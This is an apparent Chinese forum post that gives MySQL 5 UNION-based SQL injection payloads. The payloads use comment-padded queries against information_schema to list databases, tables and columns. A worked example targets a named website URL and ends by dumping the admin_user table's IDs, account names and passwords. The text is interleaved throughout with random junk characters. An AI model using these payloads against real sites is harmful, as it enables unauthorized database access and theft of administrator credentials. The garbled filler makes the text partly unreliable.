查库+ {4 {0 b, ^6 M; J" f' c+ q
/ a' H% o, m, [( \9 p! n9 G7 vid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*# |7 ?; t% ^4 b8 q( p) l
; y0 j: |7 f$ p" [% b: f4 X @查表
* v, }3 i0 @8 J( k$ _% V* O+ M! \2 z, h# W2 X. s
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
, S- w/ d8 q4 E$ F ~
1 o' ?1 ]& ~+ j) W" F4 [' P查段* m9 f9 R! Q" T H! s% z
# T8 a0 L2 q* b p" K' D0 a8 \id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
T F8 F9 e9 b+ p7 R6 @- Y) g1 _* g6 \$ q; _1 Y
$ u& R% U. Z9 m5 t$ r( S3 n
mysql5高级注入方法暴表
6 A3 F* O: l, e0 f5 r9 H8 ?! f- N) g- E7 ]. W8 L3 G. d. q6 L
例子如下:
7 ^# J& k3 C: Y: g: K4 `7 U9 k" |9 Q* x
1.爆表" p9 e* C ]; `& ~4 Q) U
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)2 c+ a' f, a4 u3 R, m# j( A
这样爆到第4个时出现了admin_user表。
9 ^1 a/ `; a; N6 O
. E+ H8 }$ X+ C. Z! I p& W: Z2.暴字段5 X/ r$ y6 L \5 @0 ]- t1 O
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*& }+ q/ L3 L/ K$ Z' h
) t; ]" c5 u. r* o7 N
7 b' g, U4 @ O7 j. l3.爆密码
/ m) y7 H( d$ R: @http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* / c/ C) u$ B& g! X
, i1 q4 W. G# o$ X# S
5 J7 q9 q; R& C+ D$ N2 D/ ^
|
发表于 2012-9-13 16:29:37
收藏
支持
反对